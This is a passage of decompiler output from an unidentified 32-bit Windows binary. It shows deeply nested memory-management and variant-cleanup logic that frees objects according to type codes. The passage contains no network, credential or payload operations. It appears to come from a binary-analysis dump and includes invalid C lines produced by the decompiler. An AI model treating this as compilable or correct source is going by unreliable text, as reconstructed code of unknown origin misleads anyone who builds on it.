															 *(_t1754 + 4) = _t1611;
															__eflags = _v152 - _t1768;
															if(_v152 < _t1768) {
																 *(_t1754 + 4) = _t1768;
															}
															_t1296 = _v156;
															__eflags = _t1296 - _t1768;
															if(__eflags != 0) {
																_push(0x20);
																_v204 = _t1296;
																_t1297 = E004115D7(_t1754, _t1768, __eflags);
																_t1809 = _t1809 + 4;
																__eflags = _t1297 - _t1768;
																if(_t1297 == _t1768) {
																	_t1298 = 0;
																	__eflags = 0;
																} else {
																	_t1298 = E0044A801(_t1297);
																}
																 *_t1754 = _t1298;
																E0040E0A0(_t1298, _v204);
																_t1790 = _v208;
																 *((intOrPtr*)( *_t1754 + 0x10)) =  *((intOrPtr*)(_t1790 + 0x10));
																 *((intOrPtr*)( *_t1754 + 0x14)) =  *((intOrPtr*)(_t1790 + 0x14));
																 *((intOrPtr*)( *_t1754 + 0x18)) = 0;
																 *((intOrPtr*)( *_t1754 + 0x1c)) = 0;
																E00453443(_t1754,  *_t1754 + 0x18,  *((intOrPtr*)(_t1790 + 0x18)));
																_t1611 =  *(_t1790 + 0x1c);
																E00453443(_t1754,  *_t1754 + 0x1c, _t1611);
																_t1768 = 0;
															} else {
																 *_t1754 = _t1768;
															}
														}
														_t1549 =  *0x4a7f38; // 0x0
														 *(_t1754 + 8) = _t1549;
														 *0x4a7f38 = _t1754;
													}
													_t983 = _v156;
													 *0x4a7f34 =  *0x4a7f34 + 1;
													__eflags = _t983 - _t1768;
													if(_t983 != _t1768) {
														_t1730 = _t983;
														_t984 =  *((intOrPtr*)(_t983 + 0x18));
														__eflags = _t984 - _t1768;
														if(_t984 != _t1768) {
															E0040B400(_t1393,  &_v156, _t1730, _t984);
														}
														_t985 =  *((intOrPtr*)(_t1730 + 0x1c));
														__eflags = _t985 - _t1768;
														if(_t985 != _t1768) {
															E0040B400(_t1393,  &_v156, _t1730, _t985);
														}
														__eflags =  *((char*)(_t1730 + 0x10));
														if( *((char*)(_t1730 + 0x10)) == 0) {
															_t1546 =  *((intOrPtr*)(_t1730 + 0x14));
															__eflags =  *((intOrPtr*)(_t1730 + 0x14)) - _t1768;
															if( *((intOrPtr*)(_t1730 + 0x14)) != _t1768) {
																E0040E1C0(_t1546, _t1730, 1);
															}
														}
														E004431AD(_t1730);
													}
													__eflags = _v136 - 1;
													if(_v136 < 1) {
														L146:
														_t1769 = _a4;
														_v100 = 0;
														_v88 = 0;
														_v84 = 0;
														_v80 = 0;
														_v76 = 0;
														_v68 = 0;
														_v56 = 0;
														_v52 = 0;
														 *((intOrPtr*)(_t1769 + 0x148)) = _v116;
														_v92 = 1;
														_v60 = 1;
														_t1450 =  *((intOrPtr*)( *_t1769 + 4));
														__eflags =  *((char*)(_t1450 + _t1769 + 0xd));
														_t1731 = _t1450 + _t1769 + 4;
														if(__eflags != 0) {
															E0047390F(_t1450,  *(_t1731 + 4),  &_v100);
															 *((char*)(_t1731 + 9)) = 0;
														} else {
															_push(0x40);
															_t1176 = E004115D7(_t1731, _t1769, __eflags);
															_t1809 = _t1809 + 4;
															__eflags = _t1176;
															if(_t1176 == 0) {
																_t1176 = 0;
															} else {
																__eflags = 0;
																 *(_t1176 + 8) = 1;
																 *((intOrPtr*)(_t1176 + 0xc)) = 0;
																 *_t1176 = 0;
																 *((char*)(_t1176 + 0x10)) = 0;
																 *((intOrPtr*)(_t1176 + 0x14)) = 0;
																 *((char*)(_t1176 + 0x18)) = 0;
																 *(_t1176 + 0x28) = 1;
																 *((intOrPtr*)(_t1176 + 0x2c)) = 0;
																 *((intOrPtr*)(_t1176 + 0x20)) = 0;
																 *((char*)(_t1176 + 0x30)) = 0;
															}
															 *(_t1176 + 0x38) =  *(_t1731 + 4);
															 *(_t1731 + 4) = _t1176;
														}
														 *_t1731 =  *_t1731 + 1;
														_t1394 =  *((intOrPtr*)(_t1769 + 0x16c));
														_t1732 = _t1769 + 0x16c;
														_t1451 = _t1769;
														_v156 =  *((intOrPtr*)(_t1769 + 0xf4));
														E004091E0(_t1769,  *((intOrPtr*)(_t1769 + 0xf4)), _t1851, _t1393 + 1);
														__eflags = _t1394 -  *_t1732;
														if(_t1394 <  *_t1732) {
															do {
																E0040C790(_t1394, _t1451, _t1732);
																__eflags = _t1394 -  *_t1732;
															} while (_t1394 <  *_t1732);
															goto L151;
														} else {
															L151:
															_t1733 = _t1769;
															 *((intOrPtr*)(_t1733 + 0xf4)) = _v156;
															_t1617 =  *((intOrPtr*)( *_t1733 + 4));
															__eflags =  *((char*)(_t1617 + _t1733 + 0xd));
															_t334 = _t1733 + 4; // 0x4
															_t997 =  *((intOrPtr*)(_t1617 + _t334 + 4));
															if( *((char*)(_t1617 + _t1733 + 0xd)) != 0) {
																_t997 =  *((intOrPtr*)(_t997 + 0x38));
															}
															__eflags =  *((char*)(_t997 + 0x10));
															if( *((char*)(_t997 + 0x10)) == 0) {
																_t1770 = _a12;
																 *_a16 = 0;
																E00408F40(_t1733, _t1770);
																 *(_t1770 + 8) = 1;
																 *_t1770 = 0;
																goto L166;
															} else {
																 *_a16 = 1;
																_t1158 =  *((intOrPtr*)( *_t1733 + 4));
																__eflags =  *((char*)(_t1158 + _t1733 + 0xd));
																_t1159 = _t1158 + _t1733 + 4;
																if( *((char*)(_t1158 + _t1733 + 0xd)) != 0) {
																	_t1777 =  *( *(_t1159 + 4) + 0x38);
																} else {
																	_t1777 =  *(_t1159 + 4);
																}
																_t1403 = _a12;
																__eflags = _t1403 - _t1777;
																if(_t1403 == _t1777) {
																	L166:
																	_t1453 =  *_t1733;
																	_t1618 =  *((intOrPtr*)( *_t1733 + 4));
																	__eflags =  *((char*)(_t1618 + _t1733 + 0xd));
																	_t1000 =  *((intOrPtr*)(_t1618 + _t1733 + 8));
																	_t1771 = _t1618 + _t1733 + 4;
																	if( *((char*)(_t1618 + _t1733 + 0xd)) != 0) {
																		_t1000 =  *((intOrPtr*)(_t1000 + 0x38));
																	}
																	__eflags =  *((char*)(_t1000 + 0x18));
																	if( *((char*)(_t1000 + 0x18)) != 0) {
																		_t1002 = E00403CC0(_t1771);
																		_t1453 =  *((intOrPtr*)(_t1002 + 0x14));
																		_v80 =  *((intOrPtr*)(_t1002 + 0x14));
																	}
																	__eflags =  *((char*)(_t1771 + 9));
																	if( *((char*)(_t1771 + 9)) != 0) {
																		_t1003 =  *((intOrPtr*)( *((intOrPtr*)(_t1771 + 4)) + 0x38));
																	} else {
																		_t1003 =  *((intOrPtr*)(_t1771 + 4));
																	}
																	__eflags =  *((char*)(_t1003 + 0x30));
																	if( *((char*)(_t1003 + 0x30)) != 0) {
																		E00408E80( &_v68, _t1453, E00403CC0(_t1771) + 0x20);
																	}
																	_t1396 = _a4;
																	_t1454 =  *((intOrPtr*)( *_t1396 + 4));
																	__eflags =  *((char*)(_t1454 + _t1396 + 0xd));
																	_t1734 = _t1454 + _t1396 + 4;
																	if( *((char*)(_t1454 + _t1396 + 0xd)) != 0) {
																		_t1009 =  *(_t1734 + 4);
																		_t1771 =  *(_t1009 + 0x38);
																		__eflags = _t1009;
																		if(_t1009 != 0) {
																			E0044CCF1(_t1009);
																		}
																		 *(_t1734 + 4) = _t1771;
																		 *((char*)(_t1734 + 9)) = 0;
																	}
																	__eflags =  *((char*)(_t1734 + 8));
																	if( *((char*)(_t1734 + 8)) != 0) {
																		 *((char*)(_t1734 + 9)) = 1;
																		goto L190;
																	} else {
																		_t1771 =  *(_t1734 + 4);
																		_v156 =  *((intOrPtr*)(_t1771 + 0x38));
																		__eflags = _t1771;
																		if(_t1771 == 0) {
																			L189:
																			 *(_t1734 + 4) = _v156;
																			 *((char*)(_t1734 + 9)) = 0;
																			L190:
																			 *_t1734 =  *_t1734 - 1;
																			_t1011 =  *((intOrPtr*)( *_t1396 + 4));
																			_t1455 =  *((intOrPtr*)(_t1011 + _t1396 + 8));
																			_t1012 = _t1011 + _t1396;
																			__eflags =  *((char*)(_t1012 + 0xd));
																			if( *((char*)(_t1012 + 0xd)) != 0) {
																				_t1455 =  *((intOrPtr*)(_t1455 + 0x38));
																			}
																			 *((intOrPtr*)(_t1455 + 0x14)) = _v80;
																			__eflags =  *((char*)(_t1012 + 0xd));
																			_t1013 =  *((intOrPtr*)(_t1012 + 8));
																			if( *((char*)(_t1012 + 0xd)) != 0) {
																				_t1013 =  *((intOrPtr*)(_t1013 + 0x38));
																			}
																			 *((char*)(_t1013 + 0x18)) = 0;
																			_t1015 =  *((intOrPtr*)( *_t1396 + 4)) + _t1396;
																			__eflags =  *((char*)(_t1015 + 0xd));
																			_v156 = _t1015;
																			if( *((char*)(_t1015 + 0xd)) != 0) {
																				_t1016 =  *((intOrPtr*)( *((intOrPtr*)(_t1015 + 8)) + 0x38));
																			} else {
																				_t1016 =  *((intOrPtr*)(_t1015 + 8));
																			}
																			_t406 = _t1016 + 0x20; // 0x21
																			_t1397 = _t406;
																			__eflags = _t1397 -  &_v68;
																			if(_t1397 ==  &_v68) {
																				L204:
																				_t1735 = _v124;
																				goto L205;
																			} else {
																				_t1109 =  *(_t1397 + 0xc);
																				__eflags = _t1109;
																				if(_t1109 != 0) {
																					E004431AD(_t1109);
																					 *(_t1397 + 0xc) = 0;
																				}
																				_t1111 =  *((intOrPtr*)(_t1397 + 8));
																				__eflags = _t1111 - 8;
																				if(_t1111 == 8) {
																					_t1474 =  *_t1397;
																					__eflags = _t1474;
																					if(_t1474 == 0) {
																						goto L197;
																					}
																					__imp__#9(_t1474);
																					_push( *_t1397);
																					E004111DC();
																					_t1809 = _t1809 + 4;
																					goto L201;
																				} else {
																					L197:
																					__eflags = _t1111 - 0xa;
																					if(_t1111 == 0xa) {
																						_t1112 =  *_t1397;
																						__eflags = _t1112;
																						if(_t1112 != 0) {
																							E0044318E(_t1112);
																						}
																					} else {
																						__eflags = _t1111 - 5;
																						if(_t1111 == 5) {
																							E0040E270(_t1397, _t1771);
																						} else {
																							__eflags = _t1111 - 0xb;
																							if(_t1111 == 0xb) {
																								_push( *((intOrPtr*)( *_t1397 + 4)));
																								E004111DC();
																								_push( *_t1397);
																								E004111DC();
																								_t1809 = _t1809 + 8;
																							} else {
																								__eflags = _t1111 - 0xc;
																								if(_t1111 == 0xc) {
																									_t1123 =  *_t1397;
																									__eflags = _t1123;
																									if(_t1123 != 0) {
																										E0044B3D9(_t1123);
																									}
																								}
																							}
																						}
																					}
																					L201:
																					_t1113 = _v60;
																					 *_t1397 = 0;
																					 *((intOrPtr*)(_t1397 + 8)) = _t1113;
																					__eflags = _t1113 - 1;
																					if(_t1113 != 1) {
																						_t1114 = _t1113 - 1;
																						__eflags = _t1114 - 0xb;
																						if(__eflags > 0) {
																							goto L204;
																						}
																						switch( *((intOrPtr*)(_t1114 * 4 +  &M0042AF0E))) {
																							case 0:
																								goto L202;
																							case 1:
																								 *_t1397 = _v68;
																								 *((intOrPtr*)(_t1397 + 4)) = _v64;
																								goto L204;
																							case 2:
																								__fp0 = _v68;
																								 *__ebx = _v68;
																								goto L204;
																							case 3:
																								_push(0x10);
																								__eax = E004115D7(__edi, __esi, __eflags);
																								__esp = __esp + 4;
																								__eflags = __eax;
																								if(__eax == 0) {
																									__eax = 0;
																									__ebx[3] = 0;
																								} else {
																									__ecx = _v56;
																									__edx =  *__ecx;
																									 *__eax =  *__ecx;
																									__edx =  *(__ecx + 4);
																									 *(__eax + 4) =  *(__ecx + 4);
																									__edx =  *(__ecx + 8);
																									 *(__eax + 8) =  *(__ecx + 8);
																									__ecx =  *(__ecx + 0xc);
																									 *(__eax + 0xc) = __ecx;
																									 *__ecx =  *__ecx + 1;
																									__ebx[3] = __eax;
																								}
																								goto L204;
																							case 4:
																								_push(0x214);
																								__eax = E004115D7(__edi, __esi, __eflags);
																								__esp = __esp + 4;
																								__eflags = __eax;
																								if(__eax == 0) {
																									__eax = 0;
																									__eflags = 0;
																								} else {
																									__esi = _v68;
																									__ecx = 0x85;
																									__edi = __eax;
																									__eax = memcpy(__eax, __esi, 0x85 << 2);
																									__esi + __ecx = __esi + __ecx + __ecx;
																									__ecx = 0;
																								}
																								__edi = _v124;
																								 *__ebx = __eax;
																								__eflags =  *(__eax + 4);
																								if( *(__eax + 4) != 0) {
																									__eax =  *(__eax + 4);
																									 *__eax =  *__eax + 1;
																								}
																								L205:
																								_t1018 = _v156;
																								__eflags =  *((char*)(_t1018 + 0xd));
																								if( *((char*)(_t1018 + 0xd)) != 0) {
																									_t1019 =  *((intOrPtr*)( *((intOrPtr*)(_t1018 + 8)) + 0x38));
																								} else {
																									_t1019 =  *((intOrPtr*)(_t1018 + 8));
																								}
																								 *((char*)(_t1019 + 0x30)) = 0;
																								__eflags =  *0x4a7f3d;
																								if( *0x4a7f3d != 0) {
																									_t1020 =  *0x4a7f38; // 0x0
																									_t1771 =  *(_t1020 + 8);
																									E0046FE90(_t1397, _t1735, _t1020);
																									_t1458 =  *(_t1020 + 8);
																									 *0x4a7f38 = _t1458;
																									 *0x4a7f3d = 0;
																								} else {
																									_t1458 =  *0x4a7f38; // 0x0
																								}
																								__eflags =  *0x4a7f3c;
																								if( *0x4a7f3c != 0) {
																									_t1398 = _v128;
																									 *0x4a7f3d = 1;
																									goto L229;
																								} else {
																									_t1771 =  *_t1458;
																									_v160 = _t1458[2];
																									_v156 = _t1458;
																									__eflags = _t1771;
																									if(_t1771 == 0) {
																										L228:
																										_t1398 = _v128;
																										_push(_v156);
																										E004111DC();
																										_t1809 = _t1809 + 4;
																										 *0x4a7f38 = _v160;
																										 *0x4a7f3d = 0;
																										L229:
																										 *0x4a7f34 =  *0x4a7f34 - 1;
																										 *((intOrPtr*)(_a4 + 0x148)) = _v8;
																										_t1023 = _v56;
																										__eflags = _t1023;
																										if(_t1023 != 0) {
																											E004431AD(_t1023);
																											_v60 = 0;
																										}
																										_t1025 = _v60;
																										__eflags = _t1025 - 8;
																										if(_t1025 == 8) {
																											_t1772 = _v68;
																											__eflags = _t1772;
																											if(_t1772 != 0) {
																												_push(_t1772);
																												__imp__#9();
																												_push(_t1772);
																												E004111DC();
																												_t1809 = _t1809 + 4;
																											}
																										} else {
																											__eflags = _t1025 - 0xa;
																											if(_t1025 == 0xa) {
																												_t1073 = _v68;
																												__eflags = _t1073;
																												if(_t1073 != 0) {
																													E0044318E(_t1073);
																												}
																											} else {
																												__eflags = _t1025 - 5;
																												if(_t1025 == 5) {
																													E0040E270( &_v68, _t1771);
																												} else {
																													__eflags = _t1025 - 0xb;
																													if(_t1025 == 0xb) {
																														_t1776 = _v68;
																														_push( *((intOrPtr*)(_t1776 + 4)));
																														E004111DC();
																														_push(_t1776);
																														E004111DC();
																														_t1809 = _t1809 + 8;
																													} else {
																														__eflags = _t1025 - 0xc;
																														if(_t1025 == 0xc) {
																															_t1079 = _v68;
																															__eflags = _t1079;
																															if(_t1079 != 0) {
																																E0044B3D9(_t1079);
																															}
																														}
																													}
																												}
																											}
																										}
																										_t1026 = _v88;
																										_t1773 = _v92;
																										_t1460 = 0;
																										_v60 = 1;
																										_v68 = 0;
																										__eflags = _t1026;
																										if(_t1026 != 0) {
																											E004431AD(_t1026);
																											_v92 = 0;
																											_t1623 = 1;
																											_t1460 = 0;
																										}
																										__eflags = _t1773 - 8;
																										if(_t1773 == 8) {
																											__eflags = _v100 - _t1460;
																											if(_v100 != _t1460) {
																												_t1773 = _v100;
																												_push(_t1773);
																												__imp__#9();
																												_push(_t1773);
																												E004111DC();
																												_t1809 = _t1809 + 4;
																												_t1623 = 1;
																												_t1460 = 0;
																											}
																										} else {
																											__eflags = _t1773 - 0xa;
																											if(_t1773 == 0xa) {
																												__eflags = _v100 - _t1460;
																												if(_v100 != _t1460) {
																													E0044318E(_v100);
																													_t1623 = 1;
																													_t1460 = 0;
																												}
																											} else {
																												__eflags = _t1773 - 5;
																												if(_t1773 == 5) {
																													E0040E270( &_v100, _t1773);
																													_t1623 = 1;
																													_t1460 = 0;
																												} else {
																													__eflags = _t1773 - 0xb;
																													if(_t1773 == 0xb) {
																														_t1773 = _v100;
																														_push( *((intOrPtr*)(_t1773 + 4)));
																														E004111DC();
																														_push(_t1773);
																														E004111DC();
																														_t1809 = _t1809 + 8;
																														_t1623 = 1;
																														_t1460 = 0;
																													} else {
																														__eflags = _t1773 - 0xc;
																														if(_t1773 == 0xc) {
																															__eflags = _v100 - _t1460;
																															if(_v100 != _t1460) {
																																E0044B3D9(_v100);
																																_t1623 = 1;
																																_t1460 = 0;
																															}
																														}
																													}
																												}
																											}
																										}
																										_t1028 = _v184;
																										__eflags = _t1028 - _t1460;
																										if(_t1028 != _t1460) {
																											E004431AD(_t1028);
																											_v188 = 0;
																											_t1623 = 1;
																											_t1460 = 0;
																										}
																										_t1030 = _v188;
																										__eflags = _t1030 - 8;
																										if(_t1030 == 8) {
																											_t1031 = _v196;
																											__eflags = _t1031 - _t1460;
																											if(_t1031 != _t1460) {
																												_push(_t1031);
																												__imp__#9();
																												_push(_v200);
																												E004111DC();
																												_t1809 = _t1809 + 4;
																												_t1623 = 1;
																												_t1460 = 0;
																											}
																										} else {
																											__eflags = _t1030 - 0xa;
																											if(_t1030 == 0xa) {
																												_t1055 = _v196;
																												__eflags = _t1055 - _t1460;
																												if(_t1055 != _t1460) {
																													E0044318E(_t1055);
																													_t1623 = 1;
																													_t1460 = 0;
																												}
																											} else {
																												__eflags = _t1030 - 5;
																												if(_t1030 == 5) {
																													E0040E270( &_v196, _t1773);
																													_t1623 = 1;
																													_t1460 = 0;
																												} else {
																													__eflags = _t1030 - 0xb;
																													if(_t1030 == 0xb) {
																														_push( *(_v196 + 4));
																														E004111DC();
																														_push(_v196);
																														E004111DC();
																														_t1809 = _t1809 + 8;
																														_t1623 = 1;
																														_t1460 = 0;
																													} else {
																														__eflags = _t1030 - 0xc;
																														if(_t1030 == 0xc) {
																															_t1062 = _v196;
																															__eflags = _t1062 - _t1460;
																															if(_t1062 != _t1460) {
																																E0044B3D9(_t1062);
																																_t1623 = 1;
																																_t1460 = 0;
																															}
																														}
																													}
																												}
																											}
																										}
																										_v188 = _t1623;
																										_v196 = _t1460;
																										__eflags = _t1735 - _t1460;
																										if(_t1735 <= _t1460) {
																											L250:
																											_push(_v128);
																											E004111DC();
																											_t1811 = _t1809 + 4;
																											__eflags = _v172;
																											if(_v172 <= 0) {
																												L263:
																												_push(_v176);
																												E004111DC();
																												_t946 = 0;
																												__eflags = 0;
																												goto L264;
																											} else {
																												_t1399 = 0;
																												__eflags = 0;
																												do {
																													_t1774 =  *(_v176 + _t1399 * 4);
																													__eflags = _t1774;
																													if(_t1774 == 0) {
																														goto L262;
																													}
																													_t1736 =  *(_t1774 + 0xc);
																													__eflags = _t1736;
																													if(_t1736 != 0) {
																														 *( *(_t1736 + 0xc)) =  *( *(_t1736 + 0xc)) - 1;
																														__eflags =  *( *(_t1736 + 0xc));
																														if( *( *(_t1736 + 0xc)) == 0) {
																															_push( *_t1736);
																															E004111DC();
																															_push( *(_t1736 + 0xc));
																															E004111DC();
																															_t1811 = _t1811 + 8;
																														}
																														_push(_t1736);
																														E004111DC();
																														_t1811 = _t1811 + 4;
																														 *(_t1774 + 0xc) = 0;
																													}
																													_t1035 =  *(_t1774 + 8);
																													__eflags = _t1035 - 8;
																													if(_t1035 == 8) {
																														_t1461 =  *_t1774;
																														__eflags = _t1461;
																														if(_t1461 == 0) {
																															goto L257;
																														}
																														_push(_t1461);
																														__imp__#9();
																														_push( *_t1774);
																														E004111DC();
																														_t1811 = _t1811 + 4;
																														goto L261;
																													} else {
																														L257:
																														__eflags = _t1035 - 0xa;
																														if(_t1035 == 0xa) {
																															_t1036 =  *_t1774;
																															__eflags = _t1036;
																															if(_t1036 != 0) {
																																E0044318E(_t1036);
																															}
																														} else {
																															__eflags = _t1035 - 5;
																															if(_t1035 == 5) {
																																E0040E270(_t1774, _t1774);
																															} else {
																																__eflags = _t1035 - 0xb;
																																if(_t1035 == 0xb) {
																																	_push( *((intOrPtr*)( *_t1774 + 4)));
																																	E004111DC();
																																	_push( *_t1774);
																																	E004111DC();
																																	_t1811 = _t1811 + 8;
																																} else {
																																	__eflags = _t1035 - 0xc;
																																	if(_t1035 == 0xc) {
																																		_t1044 =  *_t1774;
																																		__eflags = _t1044;
																																		if(_t1044 != 0) {
																																			E0044B3D9(_t1044);
																																		}
																																	}
																																}
																															}
																														}
																														L261:
																														_push(_t1774);
																														 *(_t1774 + 8) = 1;
																														 *_t1774 = 0;
																														E004111DC();
																														_t1811 = _t1811 + 4;
																													}
																													L262:
																													_t1399 = _t1399 + 1;
																													__eflags = _t1399 - _v172;
																												} while (_t1399 < _v172);
																												goto L263;
																											}
																										} else {
																											_t1775 = 0;
																											__eflags = 0;
																											do {
																												_push( *((intOrPtr*)(_t1398 + _t1775 * 4)));
																												E004111DC();
																												_t1775 = _t1775 + 1;
																												_t1809 = _t1809 + 4;
																												__eflags = _t1775 - _t1735;
																											} while (_t1775 < _t1735);
																											goto L250;
																										}
																									} else {
																										_t1082 =  *(_t1771 + 0x18);
																										_t1400 = _t1458;
																										__eflags = _t1082;
																										if(_t1082 != 0) {
																											E0040B400(_t1400, _t1458, _t1735, _t1082);
																										}
																										_t1083 =  *(_t1771 + 0x1c);
																										__eflags = _t1083;
																										if(_t1083 != 0) {
																											E0040B400(_t1400, _t1400, _t1735, _t1083);
																										}
																										__eflags =  *((char*)(_t1771 + 0x10));
																										if( *((char*)(_t1771 + 0x10)) != 0) {
																											L225:
																											 *( *(_t1771 + 0xc)) =  *( *(_t1771 + 0xc)) - 1;
																											__eflags =  *( *(_t1771 + 0xc));
																											if( *( *(_t1771 + 0xc)) == 0) {
																												_push( *_t1771);
																												E004111DC();
																												_push( *(_t1771 + 0xc));
																												E004111DC();
																												_t1809 = _t1809 + 8;
																											}
																											_push(_t1771);
																											E004111DC();
																											_t1735 = _v124;
																											_t1809 = _t1809 + 4;
																											goto L228;
																										} else {
																											_t1401 =  *(_t1771 + 0x14);
																											__eflags = _t1401;
																											if(_t1401 == 0) {
																												goto L225;
																											}
																											_t1737 =  *(_t1401 + 0xc);
																											__eflags = _t1737;
																											if(_t1737 != 0) {
																												 *( *(_t1737 + 0xc)) =  *( *(_t1737 + 0xc)) - 1;
																												__eflags =  *( *(_t1737 + 0xc));
																												if( *( *(_t1737 + 0xc)) == 0) {
																													_push( *_t1737);
																													E004111DC();
																													_push( *(_t1737 + 0xc));
																													E004111DC();
																													_t1809 = _t1809 + 8;
																												}
																												_push(_t1737);
																												E004111DC();
																												_t1809 = _t1809 + 4;
																												 *(_t1401 + 0xc) = 0;
																											}
																											_t1090 =  *(_t1401 + 8);
																											__eflags = _t1090 - 8;
																											if(_t1090 == 8) {
																												_t1471 =  *_t1401;
																												__eflags = _t1471;
																												if(_t1471 == 0) {
																													goto L220;
																												}
																												_push(_t1471);
																												__imp__#9();
																												_push( *_t1401);
																												E004111DC();
																												_t1809 = _t1809 + 4;
																												goto L224;
																											} else {
																												L220:
																												__eflags = _t1090 - 0xa;
																												if(_t1090 == 0xa) {
																													_t1091 =  *_t1401;
																													__eflags = _t1091;
																													if(_t1091 != 0) {
																														E0044318E(_t1091);
																													}
																												} else {
																													__eflags = _t1090 - 5;
																													if(_t1090 == 5) {
																														E0040E270(_t1401, _t1771);
																													} else {
																														__eflags = _t1090 - 0xb;
																														if(_t1090 == 0xb) {
																															_push( *((intOrPtr*)( *_t1401 + 4)));
																															E004111DC();
																															_push( *_t1401);
																															E004111DC();
																															_t1809 = _t1809 + 8;
																														} else {
																															__eflags = _t1090 - 0xc;
																															if(_t1090 == 0xc) {
																																_t1099 =  *_t1401;
																																__eflags = _t1099;
																																if(_t1099 != 0) {
																																	E0044B3D9(_t1099);
																																}
																															}
																														}
																													}
																												}
																												L224:
																												_push(_t1401);
																												 *(_t1401 + 8) = 1;
																												 *_t1401 = 0;
																												E004111DC();
																												_t1809 = _t1809 + 4;
																												goto L225;
																											}
																										}
																									}
																								}
																							case 5:
																								__ecx = _v68;
																								 *__ebx = __ecx;
																								goto L204;
																							case 6:
																								__esi = _v68;
																								__eflags = __esi;
																								if(__eflags != 0) {
																									_push(0x10);
																									__eax = E004115D7(__edi, __esi, __eflags);
																									__esp = __esp + 4;
																									_push(__eax);
																									 *__ebx = __eax;
																									__imp__#8();
																									__edx =  *__ebx;
																									_push(__esi);
																									_push( *__ebx);
																									__imp__#10();
																									__eflags = __eax;
																									if(__eax < 0) {
																										__eax =  *__ebx;
																										_push( *__ebx);
																										__imp__#9();
																										__ecx =  *__ebx;
																										_push( *__ebx);
																										__eax = E004111DC();
																										__esp = __esp + 4;
																										 *__ebx = 0;
																									}
																								}
																								goto L204;
																							case 7:
																								 *__ebx = _v68;
																								goto L204;
																							case 8:
																								_push(0x18);
																								__eax = E004115D7(__edi, __esi, __eflags);
																								__esp = __esp + 4;
																								__eflags = __eax;
																								if(__eax == 0) {
																									goto L567;
																								}
																								__ecx = _v68;
																								__eax = E0044B8A3(__eax, _v68);
																								goto L203;
																							case 9:
																								_push(8);
																								__eax = E004115D7(__edi, __esi, __eflags);
																								__esi = _v68;
																								 *__ebx = __eax;
																								__edx =  *__esi;
																								 *__eax =  *__esi;
																								__eax =  *__ebx;
																								__eax =  *( *__ebx);
																								__esp = __esp + 4;
																								__eflags = __eax;
																								if(__eflags == 0) {
																									_push(1);
																									__eax = E004115D7(__edi, __esi, __eflags);
																									__edx =  *__ebx;
																									 *( *__ebx + 4) = __eax;
																									__eax =  *__ebx;
																									__ecx =  *(__eax + 4);
																									__esp = __esp + 4;
																									 *__ecx = 0;
																								} else {
																									_push(__eax);
																									__eax = E004115D7(__edi, __esi, __eflags);
																									__ecx =  *__ebx;
																									 *( *__ebx + 4) = __eax;
																									__ebx =  *__ebx;
																									__edx =  *__ebx;
																									__eax =  *(__esi + 4);
																									__ecx = __ebx[1];
																									__esp = __esp + 4;
																									__eax = E00410E60(__ebx[1],  *(__esi + 4),  *__ebx);
																								}
																								goto L204;
																							case 0xa:
																								_push(0x14);
																								__eax = E004115D7(__edi, __esi, __eflags);
																								__esp = __esp + 4;
																								__eflags = __eax;
																								if(__eax == 0) {
																									L567:
																									__eax = 0;
																									L203:
																									 *_t1397 = _t1116;
																									goto L204;
																								}
																								__edx = _v68;
																								__eax = E00470870(__eax, _v68);
																								goto L203;
																						}
																					}
																					L202:
																					_t1116 = _v68;
																					goto L203;
																				}
																			}
																		}
																		_t1126 =  *(_t1771 + 0x2c);
																		__eflags = _t1126;
																		if(_t1126 != 0) {
																			E004431AD(_t1126);
																			 *(_t1771 + 0x2c) = 0;
																		}
																		_t1128 =  *(_t1771 + 0x28);
																		__eflags = _t1128 - 8;
																		if(_t1128 == 8) {
																			_t1477 =  *(_t1771 + 0x20);
																			__eflags = _t1477;
																			if(_t1477 == 0) {
																				goto L176;
																			}
																			__imp__#9(_t1477);
																			_push( *(_t1771 + 0x20));
																			E004111DC();
																			_t1809 = _t1809 + 4;
																			goto L180;
																		} else {
																			L176:
																			__eflags = _t1128 - 0xa;
																			if(_t1128 == 0xa) {
																				_t1129 =  *(_t1771 + 0x20);
																				__eflags = _t1129;
																				if(_t1129 != 0) {
																					E0044318E(_t1129);
																				}
																			} else {
																				__eflags = _t1128 - 5;
																				if(_t1128 == 5) {
																					_t851 = _t1771 + 0x20; // 0x67
																					E0040E270(_t851, _t1771);
																				} else {
																					__eflags = _t1128 - 0xb;
																					if(_t1128 == 0xb) {
																						_push( *((intOrPtr*)( *(_t1771 + 0x20) + 4)));
																						E004111DC();
																						_push( *(_t1771 + 0x20));
																						E004111DC();
																						_t1809 = _t1809 + 8;
																					} else {
																						__eflags = _t1128 - 0xc;
																						if(_t1128 == 0xc) {
																							_t1153 =  *(_t1771 + 0x20);
																							__eflags = _t1153;
																							if(_t1153 != 0) {
																								E0044B3D9(_t1153);
																							}
																						}
																					}
																				}
																			}
																			L180:
																			 *(_t1771 + 0x28) = 1;
																			 *(_t1771 + 0x20) = 0;
																			_t1402 =  *(_t1771 + 0xc);
																			__eflags = _t1402;
																			if(_t1402 != 0) {
																				 *( *(_t1402 + 0xc)) =  *( *(_t1402 + 0xc)) - 1;
																				__eflags =  *( *(_t1402 + 0xc));
																				if( *( *(_t1402 + 0xc)) == 0) {
																					_push( *_t1402);
																					E004111DC();
																					_push( *(_t1402 + 0xc));
																					E004111DC();
																					_t1809 = _t1809 + 8;
																				}
																				_push(_t1402);
																				E004111DC();
																				_t1809 = _t1809 + 4;
																				 *(_t1771 + 0xc) = 0;
																			}
																			_t1130 =  *(_t1771 + 8);
																			__eflags = _t1130 - 8;
																			if(_t1130 == 8) {
																				_t1478 =  *_t1771;
																				__eflags = _t1478;
																				if(_t1478 == 0) {
																					goto L184;
																				}
																				__imp__#9(_t1478);
																				_push( *_t1771);
																				E004111DC();
																				_t1809 = _t1809 + 4;
																				goto L188;
																			} else {
																				L184:
																				__eflags = _t1130 - 0xa;
																				if(_t1130 == 0xa) {
																					_t1131 =  *_t1771;
																					__eflags = _t1131;
																					if(_t1131 != 0) {
																						E0044318E(_t1131);
																					}
																				} else {
																					__eflags = _t1130 - 5;
																					if(_t1130 == 5) {
																						E0040E270(_t1771, _t1771);
																					} else {
																						__eflags = _t1130 - 0xb;
																						if(_t1130 == 0xb) {
																							_push( *((intOrPtr*)( *_t1771 + 4)));
																							E004111DC();
																							_push( *_t1771);
																							E004111DC();
																							_t1809 = _t1809 + 8;
																						} else {
																							__eflags = _t1130 - 0xc;
																							if(_t1130 == 0xc) {
																								_t1139 =  *_t1771;
																								__eflags = _t1139;
																								if(_t1139 != 0) {
																									E0044B3D9(_t1139);
																								}
																							}
																						}
																					}
																				}
																				L188:
																				_push(_t1771);
																				 *(_t1771 + 8) = 1;
																				 *_t1771 = 0;
																				E004111DC();
